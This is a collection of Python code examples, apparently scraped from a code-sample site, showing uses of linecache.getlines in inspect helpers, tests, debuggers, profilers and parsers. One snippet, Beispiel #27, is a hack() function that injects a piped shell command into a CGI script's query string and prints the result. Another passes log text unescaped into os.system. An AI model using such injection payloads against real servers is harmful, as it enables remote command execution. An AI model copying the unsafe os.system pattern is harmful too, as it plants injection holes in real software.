Beispiel #1
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""
    file = getsourcefile(object) or getfile(object)
    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        return lines, 0

    if isclass(object):
        name = object.__name__
        pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
        # make some effort to find the best matching class definition:
        # use the one with the least indentation, which is the one
        # that's most probably not inside a function definition.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # if it's at toplevel, it's already the best one
                if lines[i][0] == 'c':
                    return lines, i
                # else add whitespace to candidate list
                candidates.append((match.group(1), i))
        if candidates:
            # this will sort by whitespace, and by line number,
            # less whitespace first
            candidates.sort()
            return lines, candidates[0][1]
        else:
            raise IOError('could not find class definition')

    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]): break
            lnum = lnum - 1
        return lines, lnum
    raise IOError('could not find code object')
Beispiel #2
0
 def setUpClass(cls):
   """Load the Application file into the linecache to prevent exceptions when mocking the builtin open."""
   from ILCDIRAC.Interfaces.API.NewInterface import Application
   for fName in [Application.__file__, mock_module.__file__]:
     if fName.endswith(('.pyc', '.pyo')):
       fName = fName[:-1]
     linecache.getlines(fName)
Beispiel #3
0
 def test_lazycache_provide_after_failed_lookup(self):
     linecache.clearcache()
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     linecache.clearcache()
     linecache.getlines(NONEXISTENT_FILENAME)
     linecache.lazycache(NONEXISTENT_FILENAME, globals())
     self.assertEqual(lines, linecache.updatecache(NONEXISTENT_FILENAME))
Beispiel #4
0
    def makeGrammar(self, rules):
        """
        Produce a class from a collection of rules.

        @param rules: A mapping of names to rule bodies.
        """
        lines = list(itertools.chain(*[self._function(
            "def rule_%s(self):" % (name,),
            ["_locals = {'self': self}",
             "self.locals[%r] = _locals" % (name,)] + list(body)) + ['\n\n']
                                       for (name, body) in rules]))
        source = '\n'.join(self._suite(
            "class %s(%s):" %(self.name, self.superclass.__name__),
            lines))
        modname = "pymeta_grammar__"+self.name
        filename = "/pymeta_generated_code/"+modname+".py"
        mod = module(modname)
        mod.__dict__.update(self.globals)
        mod.__name__ = modname
        mod.__dict__[self.superclass.__name__] = self.superclass
        mod.__loader__ = GeneratedCodeLoader(source)
        code = compile(source, filename, "exec")
        eval(code, mod.__dict__)
        mod.__dict__[self.name].globals = self.globals
        sys.modules[modname] = mod
        linecache.getlines(filename, mod.__dict__)
        return mod.__dict__[self.name]
Beispiel #5
0
 def test_lazycache_smoke(self):
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     linecache.clearcache()
     self.assertEqual(
         True, linecache.lazycache(NONEXISTENT_FILENAME, globals()))
     self.assertEqual(1, len(linecache.cache[NONEXISTENT_FILENAME]))
     # Note here that we're looking up a non existant filename with no
     # globals: this would error if the lazy value wasn't resolved.
     self.assertEqual(lines, linecache.getlines(NONEXISTENT_FILENAME))
Beispiel #6
0
def moduleFromGrammar(source, className, modname, filename):
    mod = module(modname)
    mod.__name__ = modname
    mod.__loader__ = GeneratedCodeLoader(source)
    code = compile(source, filename, "exec")
    eval(code, mod.__dict__)
    sys.modules[modname] = mod
    linecache.getlines(filename, mod.__dict__)
    return mod
Beispiel #7
0
def findsource(object):
    """Return the entire source file and starting line number for an object.
    
    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""
    file = getfile(object)
    sourcefile = getsourcefile(object)
    if not sourcefile and file[:1] + file[-1:] != '<>':
        raise IOError('source code not available')
    file = sourcefile if sourcefile else file
    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')
    if ismodule(object):
        return (lines, 0)
    if isclass(object):
        name = object.__name__
        pat = re.compile('^(\\s*)class\\s*' + name + '\\b')
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                if lines[i][0] == 'c':
                    return (lines, i)
                candidates.append((match.group(1), i))

        if candidates:
            candidates.sort()
            return (lines, candidates[0][1])
        raise IOError('could not find class definition')
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        pat = re.compile('^(\\s*def\\s)|(.*(?<!\\w)lambda(:|\\s))|^(\\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]):
                break
            lnum = lnum - 1

        return (lines, lnum)
    raise IOError('could not find code object')
Beispiel #8
0
def read_ld_so_conf():
    def clean(ls):
        return [x for x in [x.strip() for x in ls] if x!='' and x[:1] != '#']
    conf = clean(linecache.getlines('/etc/ld.so.conf'))
    dirs = [x for x in conf if x != '' and not x.startswith('include')]
    for x in conf:
        if x.startswith('include'):
            for f in glob.glob(x.split()[1]):
                dirs.extend(clean(linecache.getlines(f)))
    return dirs
def warn_explicit(message, category, filename, lineno, module=None, registry=None, module_globals=None):
    if module is None:
        if not filename:
            module = "<unknown>"
            if module[-3:].lower() == ".py":
                module = module[:-3]
        if registry is None:
            registry = {}
        if isinstance(message, Warning):
            text = str(message)
            category = message.__class__
        else:
            text = message
            message = category(message)
        key = (text, category, lineno)
        if registry.get(key):
            return
        for item in filters:
            action, msg, cat, mod, ln = item
            if (
                (msg is None or msg.match(text))
                and issubclass(category, cat)
                and (mod is None or mod.match(module))
                and (ln == 0 or lineno == ln)
            ):
                break
        else:
            action = defaultaction

        if action == "ignore":
            registry[key] = 1
            return
        linecache.getlines(filename, module_globals)
        if action == "error":
            raise message
        if action == "once":
            registry[key] = 1
            oncekey = (text, category)
            return onceregistry.get(oncekey) and None
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        raise RuntimeError("Unrecognized action (%r) in warnings.filters:\n %s" % (action, item))
    showwarning(message, category, filename, lineno)
def get_lines_from_file(filename, lineno, context=0, globals=None):
    """Return `content` number of lines before and after the specified
    `lineno` from the (source code) file identified by `filename`.

    Returns a `(lines_before, line, lines_after)` tuple.
    """
    # The linecache module can load source code from eggs since Python 2.6.
    # Prior versions return lines from the wrong file, so we try locating
    # the file in eggs manually first.
    lines = []
    match = _egg_path_re.match(filename)
    if match:
        import zipfile
        for path in sys.path:
            try:
                zip = zipfile.ZipFile(path, 'r')
                try:
                    lines = zip.read(match.group(1)).splitlines()
                    break
                finally:
                    zip.close()
            except Exception:
                pass

    if not lines:
        import linecache
        linecache.checkcache(filename)
        if arity(linecache.getlines) >= 2:
            lines = linecache.getlines(filename, globals)
        else:   # Python 2.4
            lines = linecache.getlines(filename)

    if not 0 <= lineno < len(lines):
        return (), None, ()
    lbound = max(0, lineno - context)
    ubound = lineno + 1 + context

    charset = None
    rep = re.compile('coding[=:]\s*([-\w.]+)')
    for linestr in lines[:2]:
        match = rep.search(linestr)
        if match:
            charset = match.group(1)
            break

    before = [to_unicode(l.rstrip('\n'), charset)
                 for l in lines[lbound:lineno]]
    line = to_unicode(lines[lineno].rstrip('\n'), charset)
    after = [to_unicode(l.rstrip('\n'), charset) \
                 for l in lines[lineno + 1:ubound]]

    return before, line, after
Beispiel #11
0
def warn_explicit(message, category, filename, lineno, module = None, registry = None, module_globals = None):
    lineno = int(lineno)
    if module is None:
        module = filename or '<unknown>'
        if module[-3:].lower() == '.py':
            module = module[:-3]
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    if registry.get(key):
        return
    else:
        for item in filters:
            action, msg, cat, mod, ln = item
            if (msg is None or msg.match(text)) and issubclass(category, cat) and (mod is None or mod.match(module)) and (ln == 0 or lineno == ln):
                break
        else:
            action = defaultaction

        if action == 'ignore':
            registry[key] = 1
            return
        linecache.getlines(filename, module_globals)
        if action == 'error':
            raise message
        if action == 'once':
            registry[key] = 1
            oncekey = (text, category)
            if onceregistry.get(oncekey):
                return
            onceregistry[oncekey] = 1
        elif action == 'always':
            pass
        elif action == 'module':
            registry[key] = 1
            altkey = (text, category, 0)
            if registry.get(altkey):
                return
            registry[altkey] = 1
        elif action == 'default':
            registry[key] = 1
        else:
            raise RuntimeError('Unrecognized action (%r) in warnings.filters:\n %s' % (action, item))
        showwarning(message, category, filename, lineno)
        return
    def test_memoryerror(self):
        lines = linecache.getlines(FILENAME)
        self.assertTrue(lines)
        def raise_memoryerror(*args, **kwargs):
            raise MemoryError
        with support.swap_attr(linecache, 'updatecache', raise_memoryerror):
            lines2 = linecache.getlines(FILENAME)
        self.assertEqual(lines2, lines)

        linecache.clearcache()
        with support.swap_attr(linecache, 'updatecache', raise_memoryerror):
            lines3 = linecache.getlines(FILENAME)
        self.assertEqual(lines3, [])
        self.assertEqual(linecache.getlines(FILENAME), lines)
Beispiel #13
0
def eval(source, scope=jacklegScope, origin="__main"):
    name = uuid.uuid4().hex + '.py'
    mod = module(name)
    mod.__name__ = name
    mod._m_outerScope = scope
    pysrc, _, lastline = ecompile(source, scope, origin).rpartition('\n')
    pysrc = '\n'.join(["from monte import runtime as _monte",
                       pysrc,
                       "_m_evalResult = " + lastline])
    mod.__loader__ = GeneratedCodeLoader(pysrc)
    code = compile(pysrc, name, "exec")
    pyeval(code, mod.__dict__)
    sys.modules[name] = mod
    linecache.getlines(name, mod.__dict__)
    return mod._m_evalResult
Beispiel #14
0
def findsource(object):
    file = getsourcefile(object)
    if not file:
        raise IOError('source code not available')
    module = getmodule(object, file)
    if module:
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')
    if ismodule(object):
        return (lines, 0)
    if isclass(object):
        name = object.__name__
        pat = re.compile('^(\\s*)class\\s*' + name + '\\b')
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                if lines[i][0] == 'c':
                    return (lines, i)
                candidates.append((match.group(1), i))

        if candidates:
            candidates.sort()
            return (lines, candidates[0][1])
        raise IOError('could not find class definition')
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        pat = re.compile('^(\\s*def\\s)|(.*(?<!\\w)lambda(:|\\s))|^(\\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]):
                break
            lnum = lnum - 1

        return (lines, lnum)
    raise IOError('could not find code object')
Beispiel #15
0
def _fixed_getframes(etb, context=1, tb_offset=0):
    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5

    records = fix_frame_records_filenames(inspect.getinnerframes(etb, context))

    # If the error is at the console, don't build any context, since it would
    # otherwise produce 5 blank lines printed out (there is no file at the
    # console)
    rec_check = records[tb_offset:]
    try:
        rname = rec_check[0][1]
        if rname == '<ipython console>' or rname.endswith('<string>'):
            return rec_check
    except IndexError:
        pass

    aux = traceback.extract_tb(etb)
    assert len(records) == len(aux)
    for i, (file, lnum, _, _) in enumerate(aux):
        maybeStart = lnum - 1 - context // 2
        start = max(maybeStart, 0)
        end = start + context
        lines = linecache.getlines(file)[start:end]
        # pad with empty lines if necessary
        if maybeStart < 0:
            lines = (['\n'] * -maybeStart) + lines
        if len(lines) < context:
            lines += ['\n'] * (context - len(lines))
        buf = list(records[i])
        buf[LNUM_POS] = lnum
        buf[INDEX_POS] = lnum - 1 - start
        buf[LINES_POS] = lines
        records[i] = tuple(buf)
    return records[tb_offset:]
Beispiel #16
0
 def do_list(self, arg):
     self.lastcmd = 'list'
     last = None
     if arg and arg != '.':
         try:
             if ',' in arg:
                 (first, last) = arg.split(',')
                 first = int(first.strip())
                 last = int(last.strip())
                 last = first + last
             else:
                 first = int(arg.strip())
                 first = max(1, first - 5)
         except ValueError:
             self.error('Error in argument: %r' % arg)
             return
     elif self.lineno is None or arg == '.':
         first = max(1, self.curframe.f_lineno - 5)
     else:
         first = self.lineno + 1
     if last is None:
         last = first + 10
     filename = self.curframe.f_code.co_filename
     breaklist = self.get_file_breaks(filename)
     try:
         lines = linecache.getlines(filename, self.curframe.f_globals)
         self._print_lines(lines[first - 1:last], first, breaklist, self.curframe)
         self.lineno = min(last, len(lines))
         while len(lines) < last:
             self.message('[EOF]')
     except KeyboardInterrupt:
         pass
 def __init__( self, cachepath, logfile, capacity, debug=False ):
     self.cachepath = cachepath
     self.logfile = cachepath + '\\' + logfile
     self.capacity = capacity
     self.lines = linecache.getlines(self.logfile) # lines in logfile
     self.size, self.filecount = self.getSize()
     self.LRU = self.initLRU()
Beispiel #18
0
def get_lines_from_file(filename, lineno, context_lines,
                        loader=None, module_name=None):
    """
    Returns context_lines before and after lineno from file.
    Returns (pre_context_lineno, pre_context, context_line, post_context).
    """
    source = None
    if loader is not None and hasattr(loader, "get_source"):
        try:
            source = loader.get_source(module_name)
        except (ImportError, IOError):
            # Traceback (most recent call last):
            #   File "/Users/dcramer/Development/django-sentry/sentry/client/handlers.py", line 31, in emit
            #     get_client().create_from_record(record, request=request)
            #   File "/Users/dcramer/Development/django-sentry/sentry/client/base.py", line 325, in create_from_record
            #     data['__sentry__']['frames'] = varmap(shorten, get_stack_info(stack))
            #   File "/Users/dcramer/Development/django-sentry/sentry/utils/stacks.py", line 112, in get_stack_info
            #     pre_context_lineno, pre_context, context_line, post_context = get_lines_from_file(filename, lineno, 7, loader, module_name)
            #   File "/Users/dcramer/Development/django-sentry/sentry/utils/stacks.py", line 24, in get_lines_from_file
            #     source = loader.get_source(module_name)
            #   File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pkgutil.py", line 287, in get_source
            #     fullname = self._fix_name(fullname)
            #   File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pkgutil.py", line 262, in _fix_name
            #     "module %s" % (self.fullname, fullname))
            # ImportError: Loader for module cProfile cannot handle module __main__
            source = None
        if source is not None:
            source = source.splitlines()

    if source is None:
        try:
            source = linecache.getlines(filename)
        except (OSError, IOError):
            return None, None, None

    if not source:
        return None, None, None

    lower_bound = max(0, lineno - context_lines)
    upper_bound = min(lineno + 1 + context_lines, len(source))

    try:
        pre_context = [
            line.strip('\r\n')
            for line in source[lower_bound:lineno]
        ]
        context_line = source[lineno].strip('\r\n')
        post_context = [
            line.strip('\r\n')
            for line in source[(lineno + 1):upper_bound]
        ]
    except IndexError:
        # the file may have changed since it was loaded into memory
        return None, None, None

    return (
        slim_string(pre_context),
        slim_string(context_line),
        slim_string(post_context)
    )
Beispiel #19
0
def mea_file_unwrap(filename,sep_mark="  "):
	"""
	mea_file_unwrap(filename='Global2.mt0',sep_mark="  ")
	return (num_blk,len(blk_line))
	
	unwrap measurement files into a matrix
	failed entries will be substituted by a number
	sep_mark: change this to ',' for csv like format
	num_blk: number of blocks ( for MC simulation ) 
	len(blk_line): number of measurement n each block
	"""
	if not os.path.isfile(filename):
		print "%s not exist\n"%(filename)
		return 
	tot_lines,line_info0, line_info1,=get_info(filename)
	f=linecache.getlines(filename)
	outfilename='./'+filename.replace('.','_')+'.txt'
	fhout=open(outfilename,'w')
	num_blk=(tot_lines-line_info1-1)/(line_info1-line_info0+1)
	num_blk_line=line_info1-line_info0+1
	for blkct in xrange(num_blk):
		blk_line=[]
		for blk_line_ct in xrange(num_blk_line):
			current_line_pt=line_info1+1+num_blk_line*blkct+blk_line_ct
			current_line=f[current_line_pt].replace("failed", "-1.11")
			current_line_list=current_line.split()
			blk_line=blk_line+current_line_list
		fhout.write(sep_mark.join(blk_line)+"\n")
	fhout.close()
	print "%s: num_blk %d;\t Num_entry %d;\t Blk_line %d"\
	%(filename,num_blk,len(blk_line),num_blk_line)
	return (num_blk,len(blk_line))
def show_results(prof, stream=None, precision=1):
    if stream is None:
        stream = sys.stdout
    template = '{0:>6} {1:>12} {2:>12}   {3:<}'

    for (filename, lines) in prof.code_map.items():
        header = template.format('Line #', 'Mem usage', 'Increment',
                                 'Line Contents')

        stream.write(u'Filename: ' + filename + '\n\n')
        stream.write(header + u'\n')
        stream.write(u'=' * len(header) + '\n')

        all_lines = linecache.getlines(filename)
        mem_old = None
        float_format = u'{0}.{1}f'.format(precision + 4, precision)
        template_mem = u'{0:' + float_format + '} MiB'
        for (lineno, mem) in lines:
            if mem:
                inc = (mem - mem_old) if mem_old else 0
                mem_old = mem
                mem = template_mem.format(mem)
                inc = template_mem.format(inc)
            else:
                mem = u''
                inc = u''
            tmp = template.format(lineno, mem, inc, all_lines[lineno - 1])
            stream.write(unicode(tmp))
        stream.write(u'\n\n')
def catch_err(filename):
#	filename_list = list(filename)
	today_catalina = list(filename)[0]
	today_errlog = list(filename)[1]
	f1 = open('/home/catalina/record.txt','r')
	content1 = f1.read()
	cursor = int(content1.split(',')[1])
	if cursor == 0:
		start_line = 1
	else:
		start_line = cursor
	infos = linecache.getlines('/home/catalina/%s' % today_catalina)[start_line:]
	errlog_path = '/home/catalina/%s' % today_errlog
	if not os.path.isfile(errlog_path):
		os.system('touch %s' % errlog_path)
	x=1
	for info in infos:
		error = re.search('ERROR',info)
		if error:
			cmd1 = '''echo "%s" >> %s''' % (info,errlog_path)
			os.system(cmd1)
			for err_info in infos[x:]:
				if not re.search(r'\b\d\d:\d\d:\d\d\b',err_info):
					cmd2 = '''echo "%s" >> %s''' % (err_info,errlog_path)
					os.system(cmd2)
				else:
					cmd3 = "echo '\n----------------------------------------------------------------------------------------------------------------------------------------------------------------\n' >> %s" % errlog_path
					os.system(cmd3)
					break
		x = x+1
		start_line = start_line+1
	time = os.stat('%s' % errlog_path).st_mtime
	return (time,start_line)
Beispiel #22
0
def renderTraceback(trace):
    res = []

    for tb in trace:
        if isinstance(tb["path"],tuple):
            path = tb["path"]
            if path[0] == "ModuleImporter":
                path = os.path.join(_pyforaRoot, *path[1:]) + ".fora"
            else:
                path = path[0]
        else:
            path = os.path.abspath(tb["path"])

        if 'range' in tb:
            lineNumber = tb['range']['start']['line']
        else:
            lineNumber = tb["line"]

        res.append('  File "%s", line %s' % (path, lineNumber))

        lines = linecache.getlines(os.path.abspath(path))
        if lines is not None and lineNumber >= 1 and lineNumber <= len(lines):
            res.append("    " + lines[lineNumber-1][:-1].lstrip())

    return "\n".join(res)
Beispiel #23
0
def add_genotype_from_vcf_to_annovar(vcf_f, anno_f, new_f, sample_file):
    anno_d, anno_title = get_anno(anno_f)
    nf = open(new_f, 'w')
    print 'get anno info'
    sg = data.SampleGroup(sample_file)
    cases = sg.cases_id
    ctrls = sg.ctrls_id
    if os.path.exists(vcf_f):
        cache_data = linecache.getlines(vcf_f)
        print 'get vcf info'
        for line in range(1, len(cache_data)):
            if cache_data[line][:2] == '##':
                continue
            elif cache_data[line][0] == '#':
                vcf_title = cache_data[line].strip().split('\t')[8:] + ['allele_count', 'sample_count', 'allele_freq']
                ntl = anno_title.strip().split('\t') + vcf_title
                nt = '\t'.join(ntl) + '\n'
                nf.write(nt)
                continue
            ll = cache_data[line].strip().split('\t')
            key = tuple(ll[:5])
            if key in anno_d:
                nl = anno_d[key]+ll[8:]+count_alle_freq(sample_info=ll[9:], sample_id=vcf_title[1:-3], cases=cases, ctrls=ctrls)
                nf.write('\t'.join(nl)+'\n')
        return
    else:
        print('the path [{}] is not exist!'.format(vcf_f))
Beispiel #24
0
def generateFnameLableTuppleList(inputListName, labelre, labelfunc=None, limit=-1, ifshuffle=True):
    labelList = [] # for saving

    flist = getlines(inputListName)
    if len(flist) == 0:
        raise Exception('flist is empty')
    if limit != -1:
        flist = flist[0:limit]

    collection = []
    labelIndex = 0

    for subfname in flist:
        label = re.match(labelre, subfname).groups()[0]
        # check new label, then add it 
        if label not in labelList:
            if labelfunc != None:
                label = labelfunc(label)
            labelList.append(label)
            labelIndex += 1
        collection.append((subfname.strip(), labelList.index(label)))

    if ifshuffle:
        np.random.shuffle(collection)
    return collection, labelList
Beispiel #25
0
 def test_lazycache_already_cached(self):
     linecache.clearcache()
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     self.assertEqual(
         False,
         linecache.lazycache(NONEXISTENT_FILENAME, globals()))
     self.assertEqual(4, len(linecache.cache[NONEXISTENT_FILENAME]))
Beispiel #26
0
def _fixed_getinnerframes(etb, context=1, tb_offset=0):
    import linecache

    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5

    records = fix_frame_records_filenames(inspect.getinnerframes(etb, context))

    # If the error is at the console, don't build any context, since it would
    # otherwise produce 5 blank lines printed out (there is no file at the
    # console)
    rec_check = records[tb_offset:]
    try:
        rname = rec_check[0][1]
        if rname == "<ipython console>" or rname.endswith("<string>"):
            return rec_check
    except IndexError:
        pass

    aux = traceback.extract_tb(etb)
    assert len(records) == len(aux)
    for i, (file, lnum, _, _) in zip(range(len(records)), aux):
        maybeStart = lnum - 1 - context // 2
        start = max(maybeStart, 0)
        end = start + context
        lines = linecache.getlines(file)[start:end]
        buf = list(records[i])
        buf[LNUM_POS] = lnum
        buf[INDEX_POS] = lnum - 1 - start
        buf[LINES_POS] = lines
        records[i] = tuple(buf)
    return records[tb_offset:]
Beispiel #27
0
def hack():
  print "[X] Connecting..."
  proxer = raw_input("Type your proxy (IP:PORT) here: ")
  proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list)
  print "[X] Proxing...",
  url = urllib.FancyURLopener(proxy)
  print "[OK]"
  print "[X] Sending exploit...",
  stack = url.open(host + "includer.cgi?=|" + send + "|")
  read = stack.read()
  print "[OK]"
  print "[X] Exploited !\n"
  t_file = open('temp.txt', 'w')
  print >> t_file, read
  t_file = open('temp.txt', 'r')
  for line in linecache.getlines("temp.txt"):
      if(line[0:16]=="document.write('"):
          print line[16:-4]
      elif(line[0:18]=="document.writeln('"):
          print line[18:-4]
      elif(line[0]=="<"):
          pass
      elif(line[0:2]=="*/"):
          pass
      elif(line[0:2]=="/*"):
          pass
      else:
          print line[:-1]
Beispiel #28
0
def show_results(prof, stream=None):

    if stream is None:
        stream = sys.stdout
    template = '%6s %12s   %-s'
    header = template % ('Line #', 'Mem usage', 'Line Contents')
    stream.write(header + '\n')
    stream.write('=' * len(header) + '\n')

    for code in prof.code_map:
        lines = prof.code_map[code]
        filename = code.co_filename
        if (filename.endswith(".pyc") or
            filename.endswith(".pyo")):
            filename = filename[:-1]
        all_lines = linecache.getlines(filename)
        sub_lines = inspect.getblock(all_lines[code.co_firstlineno-1:])
        linenos = range(code.co_firstlineno, code.co_firstlineno + len(sub_lines))
        lines_normalized = {}

        # move everything one frame up
        keys = lines.keys()
        keys.sort()
        lines_normalized[code.co_firstlineno+1] = lines[keys[0]]
        while len(keys) > 1:
            v = keys.pop(0)
            lines_normalized[v] = lines[keys[0]]

        for l in linenos:
            mem = ''
            if lines_normalized.has_key(l):
                mem = '%5.2f MB' % max(lines_normalized.get(l))
            line = linecache.getline(filename, l)
            stream.write(template % (l, mem, line))
Beispiel #29
0
    def test_getline(self):
        getline = linecache.getline

        # Bad values for line number should return an empty string
        self.assertEqual(getline(FILENAME, 2**15), EMPTY)
        self.assertEqual(getline(FILENAME, -1), EMPTY)

        # Float values currently raise TypeError, should it?
        self.assertRaises(TypeError, getline, FILENAME, 1.1)

        # Bad filenames should return an empty string
        self.assertEqual(getline(EMPTY, 1), EMPTY)
        self.assertEqual(getline(INVALID_NAME, 1), EMPTY)

        # Check whether lines correspond to those from file iteration
        for entry in TESTS:
            filename = os.path.join(TEST_PATH, entry) + '.py'
            for index, line in enumerate(open(filename)):
                self.assertEqual(line, getline(filename, index + 1))

        # Check module loading
        for entry in MODULES:
            filename = os.path.join(MODULE_PATH, entry) + '.py'
            for index, line in enumerate(open(filename)):
                self.assertEqual(line, getline(filename, index + 1))

        # Check that bogus data isn't returned (issue #1309567)
        empty = linecache.getlines('a/b/c/__init__.py')
        self.assertEqual(empty, [])
def format_outer_frames(context=5, stack_start=None, stack_end=None, ignore_ipython=True):
    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5
    records = inspect.getouterframes(inspect.currentframe())
    output = list()

    for i, (frame, filename, line_no, func_name, lines, index) in enumerate(records):
        # Look inside the frame's globals dictionary for __file__, which should
        # be better.
        better_fn = frame.f_globals.get("__file__", None)
        if isinstance(better_fn, str):
            # Check the type just in case someone did something weird with
            # __file__. It might also be None if the error occurred during
            # import.
            filename = better_fn
            if filename.endswith(".pyc"):
                filename = filename[:-4] + ".py"
        if ignore_ipython:
            # Hack to avoid printing the internals of IPython
            if os.path.basename(filename) == "iplib.py" and func_name in ("safe_execfile", "runcode"):
                break
        maybeStart = line_no - 1 - context // 2
        start = max(maybeStart, 0)
        end = start + context
        lines = linecache.getlines(filename)[start:end]
        # pad with empty lines if necessary
        if maybeStart < 0:
            lines = (["\n"] * -maybeStart) + lines
        if len(lines) < context:
            lines += ["\n"] * (context - len(lines))
        buf = list(records[i])
        buf[LNUM_POS] = line_no
        buf[INDEX_POS] = line_no - 1 - start
        buf[LINES_POS] = lines
        output.append(tuple(buf))
    return "\n".join(format_records(output[stack_end:stack_start:-1]))
Beispiel #31
0
    def parse_variable(self):

        lineNumber = 1

        with open(self.var_path, 'r') as f:

            lines = f.readlines()
            for line in lines:

                if line.startswith('#') and len(line) > 1:
                    self.number_list.append(lineNumber)

                if (('#' in line) and (len(line) == 1)) or not len(line):
                    self.number_list.append(lineNumber)

                lineNumber += 1
        # print(len(self.number_list))

        if len(self.number_list) % 2 == 0:

            for j in range(len(self.number_list)):

                if j % 2 == 0:

                    start = self.number_list[j]
                    end = self.number_list[j + 1]

                    file_name = linecache.getline(self.var_path,
                                                  start).strip()[1:]
                    dlc_list = linecache.getline(self.var_path,
                                                 start + 1).strip().split(',')

                    if 'section'.upper() not in file_name.upper():

                        var_list = linecache.getlines(self.var_path)[start +
                                                                     1:end - 1]
                        # print(var_list)
                        vars_list = []
                        unit_list = []

                        var_no_unit = []

                        for var in var_list:

                            if "#" not in var:

                                if ',' in var:
                                    temp = var.strip().split(',')

                                    vars_list.append(temp[0])
                                    unit_list.append(temp[1])
                                    self.vars_list.append(temp[0])

                                else:
                                    temp = var.strip()
                                    var_no_unit.append(temp)

                        self.file_list.append(file_name)

                        if var_no_unit:

                            self.vars_no_unit[file_name] = var_no_unit

                        self.file_dlc_var[file_name] = [
                            dlc_list, vars_list, unit_list
                        ]
                    else:
                        var_list = linecache.getlines(self.var_path)[start +
                                                                     1:end - 2]
                        # print(var_list)
                        vars_list = []
                        unit_list = []

                        section = linecache.getlines(
                            self.var_path)[end - 2:end - 1][0]
                        section = section.strip().split(',')[1:]

                        var_no_unit = []

                        for var in var_list:

                            if "#" not in var:
                                if ',' in var:
                                    temp = var.strip().split(',')

                                    vars_list.append(temp[0])
                                    unit_list.append(temp[1])

                                    self.vars_list.append(temp[0])
                                else:
                                    temp = var.strip()
                                    var_no_unit.append(temp)
                            else:
                                pass

                        self.file_list.append(file_name)

                        if var_no_unit:
                            self.vars_no_unit[file_name] = var_no_unit

                        self.file_dlc_var[file_name] = [
                            dlc_list, vars_list, unit_list, section
                        ]

            # for key, value in self.file_dlc_var.items():
            #     print(key, value)

        else:
            print('variable definition file is not valid!')
            raise Exception('Please check the variable definition file!')
Beispiel #32
0
def read_dat_file(datf):

    #Read the parameter into dicts
    massparms = {}
    bondparms = {}
    angparms = {}
    dihparms = {}
    impparms = {}
    nbparms = {}
    ljedparms = {}
    hasljed = False

    count = len(linecache.getlines(datf))
    for i in xrange(2, count + 1):

        rline = linecache.getline(datf, i)
        line = rline.strip()

        if (line[0:4] == 'MOD4') and (line.split()[1] == 'RE'):
            nbbln = i
        if (line[0:4] == 'LJED'):
            hasljed = True
            ljedbln = i
        if line[0:3] == 'END':
            nbeln = i
            break

    massln = []
    bondln = []
    angln = []
    dihln = []
    impln = []

    # Read from mass to improper parameters
    for i in xrange(2, nbbln):

        rline = linecache.getline(datf, i)
        line = rline.strip()

        mass_match = _massre.match(line)
        bond_match = _bondre.match(line)
        ang_match = _angre.match(line)
        dih_match = _dihre.match(line)
        imp_match = _impre.match(line)

        if line:
            if mass_match:
                massparms = readmass(massparms, line)
                massln.append(i)
            elif bond_match:
                bondparms = readbond(bondparms, line)
                bondln.append(i)
            elif ang_match:
                angparms = readang(angparms, line)
                angln.append(i)
            elif dih_match:
                dihparms = readdih(dihparms, line)
                dihln.append(i)
            elif imp_match:
                impparms = readimp(impparms, line)
                impln.append(i)

    massln0, massln1 = (min(massln), max(massln))
    bondln0, bondln1 = (min(bondln), max(bondln))
    angln0, angln1 = (min(angln), max(angln))
    dihln0, dihln1 = (min(dihln), max(dihln))
    impln0, impln1 = (min(impln), max(impln))

    if (bondln0 - massln1 == 3) and (angln0 - bondln1 == 2) \
